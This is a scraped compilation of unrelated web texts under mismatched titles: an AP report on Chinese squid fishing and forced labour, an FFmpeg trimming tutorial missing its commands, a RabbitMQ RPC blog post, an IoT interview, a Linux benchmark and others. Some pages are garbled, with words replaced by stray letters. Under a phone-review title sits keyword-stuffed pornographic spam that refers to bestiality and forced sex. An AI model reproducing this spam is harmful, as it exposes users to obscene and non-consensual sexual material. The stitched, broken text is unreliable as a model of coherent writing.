Washington’s backyard. He said imposing restrictions on high seas fishing, something that could be discussed as part of the negotiations over a high seas treaty, would be a more effective way to curtail China’s activities than bullying. “China doesn’t do anything that Europe has not done exactly the same way,” said Pauly. “The difference is that everything China does is big, so you see it.” Seafood companies in the U.S. have started to take note of the risks posed by China’s expansion and are seeking to leverage their market power to bring more transparency to the sourcing of squid. This year, a group of 16 importers and producers banded together to devise a common strategy to root out abuse. Much of their focus is on China, which is responsible for around half of the $314 million in squid that the U.S. imported in 2019, the bulk served up as fried calamari in restaurants. The initiative is opening something of a Pandora’s box for an industry that until now has thrived in the shadows without a lot of attention focused on its supply chains. The bulk of China’s squid harvest comes from the high seas, where there’s little in the way of controls like there is in many coastal waters. “Right now, it’s the perfect situation” for would-be violators, said Alfonso Miranda, executive director of CALAMASUR , a group made up of squid industry representatives from Mexico, Chile, Peru, and Ecuador. “You can do whatever you want, even forced labor, nobody says anything, and you still have a market for your product.” One alternative is to deploy technology, like publicly available AIS tracking data, to allow consumers to eventually identify the very vessel — its owner, fishing history and precise location — that caught the fish. In that way, the seafood industry can catch up with other manufacturers, from meat producers to the garment trade, where such practices are more common. “The keyword is traceability,” said Ambassador Jean Manes, the top civilian at U.S. Southern Command in Miami. “When consumers insist on traceability, the market responds.” However, boosting transparency is a challenge the industry has grappled with for decades. Nobody knows for sure how much China is fishing on the high seas. Meanwhile, critics say regional fishing management organizations that operate on the basis of consensus are powerless to block China from registering vessels with links to illegal fishing and abuse. A case in point: the Hua Li 8, which was greenlighted by China to fish in the south Pacific in 2018 — two years after it was the target of an international manhunt when it fled warning shots fired by an Argentine naval vessel that had caught it fishing illegally. Four of the Hua Li 8’s crew members were treated like “slaves,” Indonesian officials said at the time of the ship’s arrest pursuant to an Interpol “Purple Notice.” The ship again was involved in suspicious fishing activity in 2019, this time in the western hemisphere, when it went dark for 80 hours as it was fishing along the edge of Peru’s exclusive economic zone. At the same time as the ship was offline, vessel movements were detected inside Peru’s waters, nighttime satellite data analyzed by Global Fishing Watch shows. Craig Loveridge, executive secretary of the SPRFMO, the inter-governmental fishing group, declined requests for interviews. But in an e-mail, he pointed out that it’s up to each member to take into account the history of fishing operators when deciding whether or not to authorize a vessel to fly its flag. To address concerns, several South American governments proposed at this year’s SPRFMO meeting a number of conservation measures already in place elsewhere. Ideas included banning transshipments at sea, allowing countries to board other member states’ vessels on the high seas, and creating a buffer zone so coastal states are automatically alerted whenever a foreign vessel comes within 12 nautical miles of its territorial waters. But each proposal was shot down by China, Miranda said. “China doesn’t really seem interested in expanding protection,” said Mallory. “They follow the letter of the law but not the spirit.” Moreover, once the catch is landed in China — or a warehouse anywhere — it’s impossible to discern between legal and illegally caught fish. “This is the black hole and having clarity there is really complex,” said Miranda. “There are many things that can be done but you need to rely on credible data, which right now is lacking.” In the absence of more robust monitoring, the Ocean Warrior is something of a high seas’ sheriff holding bad actors responsible. But it’s surrounded by dozens of Chinese vessels accustomed to operating with little fear of reprisal. As the sun prepares to set, and the Chinese squid fleet awakens in time for another night of fishing, the Ocean Warrior’s crew sets out on a dinghy to inspect up close the Chang Tai 802. The ship is one of 39 vessels suspected of forced labor in a May 2021 report by Greenpeace based on complaints by workers to Indonesian authorities. Six shirtless men, all of them Indonesian, gather on the Chang Tai’s stern, gesturing friendlily and looking comforted to see another human being so far from land. But the mood quickly turns when one man, who the AP isn’t identifying by name out of concern for his safety, shouts above the engine that his boss is “not nice” and asks, with only the foggiest of comprehension, whether the coronavirus pandemic that has ravaged the world has arrived in the U.S. “I’m stuck here,” he says with a sullen look before a visibly irritated Chinese supervisor appears and orders the men back to work. “I want to go home.” A day later, when the Ocean Warrior returns with a megaphone to facilitate the open water exchange, the Chinese supervisor moves quickly to block any talk with the English-speaking strangers. But as the Chang Tai pulls away, the man throws overboard a plastic bottle stuffed with his brother’s phone number scribbled on a piece of paper. An Indonesian man who has been stuck at sea on a vessel with a history of accusations of labor abuses sends out a message in a bottle. Reached back home in Indonesia, the relative confesses to knowing precious little about how his brother was recruited or the conditions of his employment. Since leaving home three years ago, after graduating from a vocational school with few other job prospects, he’s communicated with his family only sporadically. He nonetheless worries for his brother’s wellbeing, to the point that he recently pressed the agency that hired him to bring him back. The Greenpeace report cites a complaint by another anonymous Indonesian sailor on the same ship who, while ill with kidney pain due to drinking poorly treated seawater, was forced to sign a document or risk being marooned in Peru with no travel documents. “I hope he can come back soon,” says the man’s brother, hesitant to reveal too much out of fear it could compromise someone’s safety. “And I hope he’s always healthy.” AP Writer Joe McDonald and AP researcher Yu Bing in Beijing, AP Global Investigations intern Roselyn Romero in San Luis Obispo, Calif., and AP Writers Edna Tarigan and Niniek Karmini in Jakarta, Indonesia, contributed to this report. Follow Goodman on Twitter: @APJoshGoodman Contact AP’s global investigative team at Investigative@ap.org or https://www.ap.org/tips/
1
International Cricket Council selling NFTs of historic cricket moments/footage
Collect Browse and collect dozens of iconic packs on our marketplace Trade Trade your digital collectibles with a global community of fans Use & Earn Use your digital collectibles in games and applications to earn rewards
2
Memory Management Reference
Welcome to the strong! This is a resource for programmers and computer scientists interested in p and p . p A glossary of more than 500 p terms, from p to p . p Articles giving a beginner’s overview of p . p Books and research papers related to p . p Frequently asked questions about p . The Memory Management Reference is maintained by Ravenbrook Limited. We also maintain the Memory Pool System (an open-source, thread-safe, p ), and we are happy to provide advanced p solutions to language and application developers through our consulting service.
4
How to Cut/Trim Videos in FFmpeg
In this tutorial, we’ll see how you can cut/trim/extract part of a video file using FFmpeg in 3 different ways. There are fast ways to achieve this using less-accurate seeking and copying the video, and there is a frame-accurate technique that is slow but accurate with the option of re-encoding your video. Table of Contents Let’s suppose that you want to extract a portion of your video – say from the 10th to the 20th seconds. The first thing that you need to do is tell FFmpeg to seek to the 10th second, right? This is achieved using the -ss parameter in the FFmpeg command line and the syntax is – Here, the time is specified as HH:MM:SS.MILLISECONDS. For example, you can tell FFmpeg to seek to 01:02:03 – i.e., the 3rd second of the 2nd minute of the 1 hour of the movie! Using -ss, we specified the start time. Now, let’s learn to specify the end time as well. And, if we put those two together, we can efficiently cut / splice a video using FFmpeg. You can specify the duration of the required clip using the -t parameter. For example, -ss 40 -t 10 instructs FFmpeg to extract 10 seconds of video starting from the 40th second. You can specify the end-time using the -to parameter. For example, -ss 40 -to 70 instructs FFmpeg to extract 30 seconds of the video starting from the 40th second to the 70th second. Note: if you use both  -t and -to, then only -t will be used. If you re-encode your video when you cut/trim, then you get a frame-accurate cut because FFmpeg will re-encode the video and start with an I-frame. Here is the command line for this using output seeking. In this example, you are instructing FFmpeg to read a video named inputVideo.mp4 and extract 5 seconds starting at the 3rd second and ending at the 8th second – while re-encoding it using libx264. You can also use this commandline to re-encode at a particular bitrate, or quality using crf, change the resolution, etc. Do remember that this option will take a lot of time and resources because you are performing a re-encode. But, it does have its advantages that cannot be overlooked. Here is what the output looks like. I cut a 5 second section and re-encoded it using libx264. You can see that it starts accurately at the requested time without any stutters or black frames. The time-stamp indicates this if look carefully. This is because FFmpeg re-encodes the video from the start-time and can insert I-frames as necessary to produce a frame-accurate clip of the video. p Related:Install and Use FFmpeg on Windows: A Simplified Step-By-Step Guide Here is a simple commandline that you can use to cut/trim/extract a portion of your video – fast! The parameters are simple to understand. You are instructing FFmpeg to read a video named inputVideo.mp4 and extract 5 seconds starting at the 3rd second and ending at the 8th second. Additionally, you are telling FFmpeg to copy the audio and video and not perform re-encoding – this is very fast! Putting the -ss parameter before the -i parameter is called input seeking and is very fast because FFmpeg jumps from I-frame to I-frame to reach the seek-point. Since the seeking operation jumps between I-frames, it is not going to accurately stop on the frame (or time) that you requested. It will search for the nearest I-frame and start the copy operation from that point. If we insert the -ss parameter after the -i parameter, it is called output seeking. But, here again is a problem. In video compression, you have I-frames that are indepently encoded and you have predicted frames (P, B) that depend on other frames for decoding. If the start time that you specified falls on a Predicted Frame, the copy operation will start with that frame (call it X). It is possible that the frames that “X” requires in order to be decoded are missing in the output! Consequently, it is possible that the output video will not start smoothly and might have some stutter, or black video until the first I-frame is reached. Here is the output. You can see that the time-stamp starts around the 5th second and carries on till the 8th second. Again, similar to input-seeking, it cannot find an I-frame to perform accurate clips. There you have it – three simple ways to cut, trim, extract a portion of your videos using FFmpeg. All three methods cater to different needs, so be sure to try them out, understand your requirements, and use the right one for your project! Do visit the rest of our FFmpeg tutorials here. Thank you and see you next time! Krishna Rao Vijayanagar Krishna Rao Vijayanagar, Ph.D. is the Editor-in-Chief of OTTVerse, a news portal covering technological and business news in the OTT space. With extensive experience in video compression, ABR streaming, video analytics, monetization, and more, Krishna has held multiple roles in R&D, Engineering, and Product ownership at companies such as Harmonic Inc., MediaMelon, and Airtel Digital. Krishna has published numerous articles and research papers on the latest trends in OTT and frequently speaks at industry events to share his insights and perspectives on the fundamentals and the future of OTT streaming.
4
12-foot-tall replica of the Washington Monument hidden under a manhole cover
Unknown to most passersby, there’s a 12-foot-tall replica of the Washington Monument under a manhole near the actual monument. Officially known as “Bench Mark A,” this underground oddity is actually a Geodetic Control Point that’s used by surveyors. It’s part of the network of a million control points across the country that helps the National Geodetic Survey (NGS) synchronize all of the government’s maps. According to NGS modernization manager p , “Geodetic control points provide starting points for any map or measurement. It has to be more accurate than any measurement you do on top of it, so we pick things that tend to be extremely stable.” Usually that means metal caps or rods that are driven down into the ground, but this quirky control point mirrors the form of its next-door neighbor. “All the surveys we’ve done, going back to the early 1900s, have used it,” says Smith. Most recently, it was used in the aftermath of the 2011 Washington earthquake. Measurements over the past century have shown that the marshy soil below Washington Monument has risen 6.2 centimeters, at an average rate of 0.5 millimeters per year. The mini monument was placed in the 1880s as a part of a trans-continental leveling program. The ground level here was much lower at that time, with large parts of the Washington Monument foundation still visible above ground (see fourth image above). The mini monument was above ground for a time, before being encased in a brick chimney and buried. Outside of surveying circles, it’s been largely forgotten. Know Before You Go The survey marker is underneath a manhole, just south of the Washington Monument. Speak to a Park Ranger before trying to see it. Atlas Obscura Experiences The Spies of Georgetown Community Contributors Added by Elliot Carter e j Edited by notoriousFIG, ernestdubrul, jplivolsi Published February 7, 2017 Edit this listing p Washington Monument Lightning Rod 0.02 miles Washington Monument Access Hatch 0.03 miles Jefferson Pier Marker 0.09 miles In partnership with KAYAK Plan Your Trip
1
ECUs and other IoT use cases need Onboarding Excellence
The Device Chronicle interviews Jonathan Wilkinson, an IoT project leader who passionately believes in delivering the best onboarding experience to the user setting up ECUs or other IoT devices for the first time. Jonathan is an IoT and Digital Specialist with extensive expertise in topics such as ECUs and telematics, Energy Management, Smart Home, BeMS, Smart Grid, EV Charging and Big Data Analytics. We spoke to Jonathan about two of his most recent projects: one an industrial IoT project with ECUs in lorries, and the other a consumer project with home boilers which brings us to the main thrust of this article. Jonathan has observed that in the development of IoT products with an example of ECUs in lorries, product managers and engineers are so concentrated on the product after it’s connected to the Internet, that they forget that you actually have to get it on to the Wi-Fi network or cellular connection to begin with. A good IoT product has product managers and engineers who have thought this through meticulously. They have tested it with a variety of different end users in many different scenarios. Onboarding mostly happens only once but if it works well then it will reduce significant volumes of calls to the help desk and increase customer satisfaction. IoT product makers need to think beyond designing and engineering a product that works well once it’s onboarded and activated, and actually think hard about how to ensure that the the many different types of users out there with differing degrees of tech savvy are able to easily connect the IoT product to the Internet in the first place. Device onboarding, according to Jonathan, is often overlooked. He starts with the example of Ideal Heating where they are connected thermostats on its boiler products. As a consumer device, an Ideal boiler with a connected thermostat has lots of different users with different technology levels and they all need to interact with an IoT device. This brings a tremendous focus on usability. The device must be designed so that everyone can understand it, from how they operate the device to the basics of getting it connected to the Internet in the first place. This product has to deal with the reality that most users have little patience and want the device to work immediately. There are additional complicating permutations such as different types of Internet connections, different browsers in use. User struggling to cope with access and product activation credentials. There are just so many things that can go wrong. Key stages in IoT usability with IoT devices including ECUs Jonathan describes two key stages in the IoT product usability challenge. One is the onboarding of the device and getting it connected to the Internet. Product managers must ensure that there is a slick sign on process into the device. People hate the complexities of a password and this can create frustration before people actually start to use the product. This is where extensive user testing helps to synthesise the best possible experience. Screen simplifies matters Jonathan continues to say that if the application interface on the IoT product does have a screen then it becomes easier. iIf the product doesn’t have a screen then there may be a need for pairing mode to connect to the user’s Wi-Fi network. This makes it more challenging for many users. “Maybe they have pressed a button and then the LED flashes. These buttons can be confusing and their meaning can be lost in translation depending on who is engaging with them. The developer will say the 1Hz flashing LED will mean this and the 5Hz flashing LED will mean this. But in the product user manual it will often ask the question to the end user: Is the LED flashing quickly or slowly? The end user may not know which state the LED is in. The trick for Jonathan is to engineer every on-boarding step to be simple. You will find this with a Sonos manual. Also with the Nanit IoT baby monitor product, there is a very smooth on-boarding process through the manual. The use of Bluetooth to help pair the connection with Wi-Fi can also help and make general onboarding that bit easier. Connecting through an access point on the IoT device can be more challenging for consumers, especially with many mobile phone OS versions outside of iOS versions 13 and 14. Onboarding in the dark with ECUs We move to the next conundrum in the IoT product onboarding: How do you onboard IoT products without buttons or LEDs? There are good examples from the consumer world of how this is done well. Sonoff is a wireless light switch and it uses a QR code to execute an outbound Bluetooth authentication. The user simply uses their phone camera to scan the QR code and that gives its credentials to connect over Bluetooth and the device gets onboarded over their Wifi network. In industrial IoT, there are many projects where IoT devices without screens or LEDs are deployed. Jonathan makes reference to a recent project where there is an ECU device fitted to a lorry. There is no LED and no button to avoid water damage, no bluetooth so Wifi connectivity problems. how do you onboard the device so it emerges in the industrial sector.  A QR code as a proof of purchase (POP) code and the credentials in the cloud. Once the user authenticates and proves that they are in front of the product by scanning the QR code, it can be printed on the manual so they can get access to the product and commission it. Cellular power over the device life with ECUs Jonathan focuses on the use of LTE M cellular communication while he was Head of IoT at Ideal Heating. LTE M provides ample connectivity and bandwidth for IoT and it is a cost saver over the lifetime of the devices. A sim card is simply inserted into the device, so that as soon as the product is powered up and it gets signal strength the device will connect and be operational to receive and transmit data. LTE M works at a frequency of 800Mhz over 4G-based networks so it’s very suitable for IoT devices fitted inside buildings and even hard to reach locations such as cellars. Jonathan goes on to assess the coverage LTE M offers. In the US, LTE M is quite well established. In the UK, O2 offers LTE M and Vodafone over narrowband IoT, so half the country has one technology and the other half with another. Jonathan continues “There are companies selling sim cards that will offer IoT connectivity for 10 years and will transmit 3 to 4 mbytes per month and update the device every 15 minutes.” Jonathan says that these sim cards are typically used in robotic lawn mowers for GPS positioning connectivity. It’s integrated with the connectivity as part of the service charge. This is vital as in gardens there may not be weak or non-existent Wi-Fi connectivity. Proactive maintenance with ECUs In a recent project Jonathan worked on, heavy goods vehicles were fitted with an IoT device that monitors tire health in fleets and detects if a tire is having problems. This could be low tire pressure or high temperature. This detection use case supports proactive maintenance. Jonathan elaborates “If you have a lorry or a goods vehicle and it’s out on the road. If it gets a problem with its tires and you have to get someone out to repair it, this would be time down and money lost. So if IoT can be used to automate and simplify tire management, this could save the organisation allot of time and money. OTA software updates and the ECUs The ECU device that is fitted to the truck is an embedded Linux device. It uses Yocto as its operating system and p provides the U Boot support and the over-the-air software updates to the devices. The ECUs that goes on the truck can work hand in hand with a second telematics device based on LTE M. The use of Mender for robust and secure OTA software updates with the ECUs enabled the project team to get a build quick to market. Jonathan says “the software updates were working within a week. It’s an OTA solution that has great support for Yocto builds and great product experts to help and advise.” Mender was selected over 4 other options. Another key thing about Mender for Jonathan is the delta updates the solution provides. This means that only the required fraction of the update will be executed each time saving on bandwidth. This is important when you consider that an updated image can be 200 to 300 mbytes in size each time and if a full update had to be done each time, this would be slow over cellular and cost a fortune. OTA software updates are crucial Jonathan believes in the importance of the onboarding experience for IoT project success but he is also adamant that over the air software updates are critical. He says that once a robust and reliable OTA software updates system is in place then operations are seamless. User will not know that it’s happening. Bug fixes, security updates and feature releases will be executed seamlessly to the devices. He adds that as long as you have OTA software updates that are secure and fail safe, almost everything else can be fixed. OTA has the potential to save a situation when it comes to a detected security issue. Remember to penetration test, test, test Jonathan concludes with some IoT cybersecurity advice. “A 3rd party penetration tester must be involved in security testing of IoT devices before they are commissioned. The security risks to IoT devices can include access elevation where an actor signs in as a basic user, and then elevates their access to an administrator, before going into a device in the fleet. DOS attacks can also be easy for a hacker, especially if the IoT device has limited resources. There is considerably more risk with consumer products than with industrial products as there are more attack vector possibilities from hobbyists once you put an application in a store for download.  The challenge too with IoT devices is that often basic security principles are not adhered to by manufacturers. Jonathan insists on making security by design an integral part of the product development strategy. Of course manufacturers must have it as a responsibility to ensure the security of their products. The p passed into law recently in Washington will help with this. Visit iBee.uk for more information on Jonathan and the services he offers. Here’s another fascinating interview with an IoT leader in maritime.
1
Infinix Smart 5 Unboxing and Review Watch this before you buy KEY FEATURES
South Tampa good pussy amatuer. Women with naked muscular men, looking for a sexy strong man that needs woman horny married middle aged bitches to hook up with the ladies. Sullivan nude big girls swingers, nude Fairbank Iowa bi women date room, swinging couples lifestyle Southern VT swinger. Pussy flashing in lundon. Couple try mmf fuck threesome. Nude sex dares daily motion. Fuck women ass hot horny married middle aged bitches woman for discreet no strings fun with married buddys. Delcambre LA personal ads nude woman over 30 naked and legal. Average woman pose naked for a living and work a lot of percing. Sexy babes doing sexy exercise nicely. Naked pussy with a big penis fucking nice ass women ready too fuck women deep free live! Black girls giving goldenshowers, fuck book meet local women down to fuck in Ionia Michigan George West. Discreet encounters I'm a whole lot of fun not looking for nothing serious just friends people I can travel to see long time double penetration. Milfs in camps Mound Valley KS swingers, Millinocket ME horny girls closeup, horny whores in central horny married middle aged bitches who want get fuck. Sexy girl messuse fucks. Sex with a duck horny married middle aged bitches, fuck in the public nude, nude girls phone numbers for sex Port Isabel Texas only. I'm just here for some NSA fun love to give oral and make a women feel great. Can you really fuck a woman? Shemale play with lover in open places. Frendsip clab sex opan fuck. Reno Sparks NV being forced to have sex with a good dominant girl horny married middle aged bitches cell phone numbers of horny mature women in trouble. Body rub classifieds Saraland AL 36571 adult personals in central SC beach who want websites built. Scat slut in 14623 fuck site with no cc & no sign up people looking to sext near Marine City Michigan classifieds. Girls from Dana Compton Morenci showing there titties, fuck old men WI Milwaukee fuck pix around the state. Black man in my wife, women for threesome McConnellsville Ohio personals. Find a local slut for contact. Middle aged white woman get in fucked painfully. Like men who suck cock and ass in coloardosprings! Bryce Dallas women personals fuck homemade. Caliornia girl gets fucked hard in a taxi. Horny wives at the gym 3-5 times a week talented musician swinger writer performer of progressive rock. Sexual massage horny married middle aged bitches shier, black women fucking beastiality, nude at home health. I guess I'm looking for someone who also has similar qualities. Sexy marthi aai Fort Bidwell CA sex sotri. Strawberry CA adult sex black pages, looking for MFM horny married middle aged bitches couple, horny wives 50 in around Southport beach wanting sex. I'm looking for a girl on here that doesn't sound like she has a prerecorded speech made. Fucking in a circle men, sex woman hurt physical. Woman love fucking Savanna Georgia view. Kingston WA horny old women. Woman and long size cock sex horny married middle aged bitches, personal pages of nudist couple, beautiful naked interracial lovers. How to beat date ariane? Women in store nothing drink piss.
3
RPC over RabbitMQ (With Elixir)
At Community, we use RabbitMQ, a lot. It's the infrastructure backbone that allows our services (over forty at this point) to communicate with each other. That mostly happens through events (since we have an event-sourced system), but in some cases what we need is a request-response interaction between two services. This is the best tool in a few use cases, like retrieving data on the fly or asking a service to do something and return a response. An industry standard for such interactions is HTTP, but we are not big fans of that. Instead, since RabbitMQ is so ubiquitous in our system, we settled on using it for request-response interactions as well in the form of Remote Procedure Calls (RPCs). In this post, I'll go over the architecture of such interactions. I'll talk about the RabbitMQ topologies we use to make them work, the benefits around reliability, the compromises around performance, and finally how this all implemented to be as fault-tolerant as possible with Elixir. Photo by amandazi photography on Unsplash An RPC can be seen as a function call across system boundaries, instead of at the code execution level. An RPC allows you to call a procedure on another service and treat it mostly like a local function call (with the additional error handling to account for the network interaction). I won't go into too much detail about RPCs themselves, but you're probably familiar with a common form of RPC: HTTP. HTTP request-response interactions between services in a service-oriented architecture are essentially RPCs, they're just less explicit on the fact that they're calling a procedure. One of the benefits of RPCs is, like HTTP, that they are agnostic of technologies. A services written in Elixir can make an RPC (or HTTP request) to a service written in Go, for example. If you want to read more about RPCs, their definition, their benefits, and more, guess where I'll link you to? Exactly, Wikipedia. Throughout this post, I will refer to the services involved in an RPC as the caller service and the receiver service. At Community, we chose to do RPCs over RabbitMQ, instead of the common service-to-service communication via HTTP, for a few reasons. The main reason is that we want to use message queues as often as possible. When you have a queue-based message broker between services that talk to each other, the availability requirements of the services can be less demanding. If you have two services that communicate over HTTP, then if the receiver service is down it means that the requester service will not get a response. Instead, the requester service will have to implement request retries in order to increase the chances of a successful request. With RabbitMQ in the middle, if the receiver is down then the RPC is queued and can be picked up once the receiver comes back up. Another important reason that influenced our decision is that we make heavy use of RabbitMQ for all sorts of things. This means our engineer know it well, our infrastructure is solid, and we have good systems to trace and observe messages flowing through it. One compromise we had to make is that, generally speaking, RPCs over RabbitMQ tend to be slower than direct service-to-service communication (such as HTTP). This is hard to avoid given that in our case we have a message broker sitting between the caller service and the receiver service. That means that you'll at least have twice the RTT (round-trip time) on the network, since the messages you're sending and receiving need to jump through one more hop than if you do direct service-to-service communication. However, when we do RPCs the bottleneck is rarely the network or the message broker, and instead tends to be the processing of the RPC itself. So, we're fine with the compromise here. Let's talk about the RabbitMQ topology that powers our RPC system. We have the following components in place: A headers exchange called rpc. Caller services publish RPCs to this exchange with two headers, destination (the receiver service name) and procedure (the procedure name). Per-service queues where RPCs end up. Their name usually looks like receiver_service.rpcs. Multiple instances (nodes) of the same service share a single queue. All the running instances of the receiver service consume from this queue. A binding between each per-service queue and the rpc exchange. Since rpc is a headers exchange, the binding happens on the headers. Most commonly, receiver services bind their queue to the rpc exchange on the destination: receiver_service_name header, but sometimes we can be more flexible and specific by also using the procedure header. A per-instance response queue where responses to RPCs are published by the receiver service. Each instance of the caller service consumes from its dedicated response queue. Below is an artistic representation of the RabbitMQ topology. This one is for you, my visual friends. Our focus when designing this architecture was not performance. Since our system is event-sourced, when services need to access data fast, we usually have alternatives to RPCs. In those cases, instead of fetching data from another service via RPC, a service can usually build a "local" data store (usually Redis, but whatever fits best) by consuming events and have fast access to that data store. However, this doesn't cover use cases where a service wants to ask another service to do something and return a result. This can be usually also be done via asynchronous events, but sometimes it really can't and in any case we like the agility of RPCs for when we're moving fast and don't want to commit to particular data exchanges in the long term. Instead, we heavily focused on reliability and resource utilization. We want our RPCs to succeed whenever they can. We also want to limit RabbitMQ resource utilization as much as possible, since the message broker architecture shares the broker between all the services that use it. With these goals in mind, we came up with the topology described above. In the sketch below, I'm focusing on the caller service perspective. This is what happens, step by step, when a service makes an RPC: The caller assigns a new UUID to the request and encodes the request (we happen to use Protobuf, but anything would work). The caller includes the name of the response queue in the reply_to metadata field of the RabbitMQ message. The caller publishes the request on the main RPC exchange (rpc) using headers to specify the destination and procedure to call. If publishing the request is successful, the caller stores the request in an in-memory key-value store (ETS for Elixir and Erlang folks), storing the mapping from request ID to caller process. This is used to map responses back to requests when they come back. The caller has a pool of AMQP channels also consuming from the response queue. When the response comes back on such queue, a consumer channel picks it up, finds the corresponding caller process from the in-memory key-value store, and hands the caller process the response. From a code standpoint, an RPC really does look like a function call. The main difference is that an RPC can definitely fail due to the network interaction, so we always make sure to return a successful value or an error value. In Elixir, that translates to {:ok, response} or {:error, reason} tuples. In a typed language (say Haskell) it would be the "either" type. This is what an RPC looks like from the caller side (in Elixir-flavored pseudocode): It's worth focusing on the response queue. All AMQP channels in the caller pool declare this queue when they start up. This is a common pattern in RabbitMQ since declaring resources (queues, exchanges, and bindings) is idempotent, that is, you can do it as many times as you want with the resource being declared only once. The response queue is declared with a key property: auto_delete. When this property is present, RabbitMQ deletes the queue as soon as there are no channels consuming from it anymore. This is exactly the behavior we want: as long as a caller pool is "up and running", there's going to be at least one channel consuming from the queue and handing responses over to caller processes. However, if the whole pool or the whole node for the caller goes down then the queue will be deleted. This works perfectly, because if the caller node goes down, then we likely lost the "context" of the requests, and even if the node will come back up then it won't know what to do with the responses anymore. As one RabbitMQ documentation page puts it: Reply messages sent using [RPC] are in general not fault-tolerant; they will be discarded if the client that published the original request subsequently disconnects. The assumption is that an RPC client will reconnect and submit another request in this case. In this way, we allow RabbitMQ to clean itself up and avoid leaving garbage in it, without writing any code to do so. The code for each AMQP channel that consumes responses goes something like this: When a response comes back, the caller does a key lookup on the response's request ID in the in-memory key-value data store to retrieve the original request and moreover the process that's waiting on the response. It looks like this: The Elixir process architecture and supervision tree structure we use for the caller is based on the properties of the response queue described above. We have the following constraints: If the in-memory key-value store that holds the mappings between request IDs and caller processes (ETS) crashes, we want the whole pool to crash. We wouldn't be able to map responses back to requests in any case at that point, and it's better to let RabbitMQ delete the whole response queue in such cases. If a connection or a channel goes down, we don't want to delete the response queue. As long as there's at least one channel consuming from the response queue, we'll be able to hand responses back to the corresponding caller processes. With these constraints, we designed this supervision tree: It's pretty deep and nested, but a lot of it is dancing to use the right supervision strategies. We have a main supervisor for the whole caller architecture. Then, we have a pool supervisor that supervises the connections and channels. That supervisor's children are supervisors that each look over one AMQP connection and one "channel supervisor". The channel supervisor supervises AMQP channels. That was hard to type, but hopefully it makes sense? I won't go into detail here, but the point of this design is that if anything in that supervisor fails, the failures bubble up and cascade correctly. If there's really nothing more fun that you could do (I hardly believe that), play "kill the process" in your head and see what happens when you kill any process above. It's fun, if this sort of stuff is fun for you (which is a tautology). The registry shown in the diagram is an Elixir Registry that all AMQP channels register themselves to. This allows us to access AMQP channels fast, without going through a single pool process. I talked more about Registry-based process pools in Elixir in another blog post. All the code in there is build on top of the AMQP Elixir library. The receiver architecture, compared to the caller, is straightforward. Every service sets up a pool of RabbitMQ connections (and channels), declares a queue, and binds it to the main RPC exchange (rpc). That exchange is a headers exchange, and each service usually binds the queue with the destination header matching that service. For example, here's the pseudocode for the receiver_svc service: All AMQP channels over all nodes of the receiver service declare the queue and bind it on every startup. Idempotency, friends! From here, it's all downhill: when a request comes in on a channel, the node decodes it, processes it, produces a response, and publishes it back on RabbitMQ. Where does it publish it? Well, good question. That's why all requests have the reply_to RabbitMQ metadata field set to the reply queue of the caller. We take advantage of the default amqp.direct exchange, which is pre-declared by all RabbitMQ nodes, to publish the response directly to the reply queue. The pseudocode to handle a request is this: Below is a nice artsy drawing focusing on the RabbitMQ topology and interactions of the receiver service. As far as Elixir specifics goes, we use Broadway to consume RPCs, hooking it up with the broadway_rabbitmq producer. I personally made enough changes to broadway_rabbitmq by now that, look at that, it perfectly fits our use case! This is how a typical Broadway pipeline to consume RPCs looks like in our services: As you can see, broadway_rabbitmq exposes the AMQP channel it uses to consume under the hood in the message metadata. We use that to send replies. Easy-peasy. Small disclaimer: we have a wrapper library around Broadway that makes this slightly boilerplate-y code a bit simpler and more tailored to our use case. It also provides us with some nice additions such as round-robin connection attempts over a list of RabbitMQ URLs (for reliability), automatic decoding of requests (so that the decoding is done under the hood), metrics, error reporting, and so on. However, the gist of it is exactly the code above. We saw how we architected a system to make service-to-service RPCs over RabbitMQ. Then, we went over the RabbitMQ topology we use, showing all the queues, exchanges, and bindings involved. Finally, we also covered the Elixir-specific implementation of this system, to sprinkle some practical examples on top of this stuff. Here's some more resources on RPCs over RabbitMQ: RabbitMQ's tutorial shows a nice step-by-step implementation of RPCs over RabbitMQ using the Python client. It's a bit less complex than our architecture since the response queue doesn't get deleted when the caller stops, but it can still go a long way. They do make it clear that this is not a totally production-ready solution. RabbitMQ's "direct reply-to" documentation, which shows an alternative way to do RPCs over RabbitMQ that's built-in into RabbitMQ. This solution is simpler than ours as it doesn't allow multiple consumers to get messages from a shared response queue, but it's pretty cool. I learned about it while writing this blog post. A nice blog post about RPC over RabbitMQ. Lots of Python code to look at. I need to thank my coworker and friend Tom Patterer, who designed and implemented the system with me and helps me maintain it while our architecture and needs to keep growing. I also need to thank José because he pushed me to write this blog post when I chatted with him about all of this.
2
Intel Core I9 11900K: Five Linux Distros Show Sizable Lead over Windows 11
Now that Windows 11 has been out as stable and the initial round of updates coming out, I've been running fresh Windows 11 vs. Linux benchmarks for seeing how Microsoft's latest operating system release compares to the fresh batch of Linux distributions. First up is the fresh look at the Windows 11 vs. Linux performance on an Intel Core i9 11900K Rocket Lake system. Microsoft Windows 11 Pro with all stable updates as of 18 October was used for this round of benchmarking on Intel Rocket Lake. The Windows 11 performance was being compared to all of the latest prominent Linux distributions, including: - Ubuntu 20.04.3 LTS - Ubuntu 21.10 - Arch Linux (latest rolling) - Fedora Workstation 35 - Clear Linux 35150 All the testing was done on the same Intel Core i9 11900K test system at stock speeds (any frequency differences reported in the system table come down to how the information is exposed by the OS, i.e. base or turbo reporting) with 2 x 16GB DDR4-3200 memory, 2TB Corsair Force MP600 NVMe solid-state drive, and an AMD Radeon VII graphics card. Each operating system was cleanly installed and then run at its OS default settings for seeing how the out-of-the-box OS performance compares for these five Linux distributions to Microsoft Windows 11 Pro. But for the TLDR version... Out of 44 tests run across all six operating systems, Windows 11 had just three wins on this Core i9 11900K system. Meanwhile Intel's own Clear Linux platform easily dominated with coming in first place 75% of the time followed by Fedora Workstation 35 in second place with first place finishes 9% of the time. The geometric mean for all 44 tests showed Linux clearly in front of Windows 11 for this current-generation Intel platform. Ubuntu / Arch / Fedora were about 11% faster overall than Windows 11 Pro on this system. Meanwhile, Clear Linux was about 18% faster than Windows 11 and enjoyed about 5% better performance overall than the other Linux distributions. Let's look at some of those individual results now.
9
Synthetic brain cells that store 'memories' are possible, new model reveals
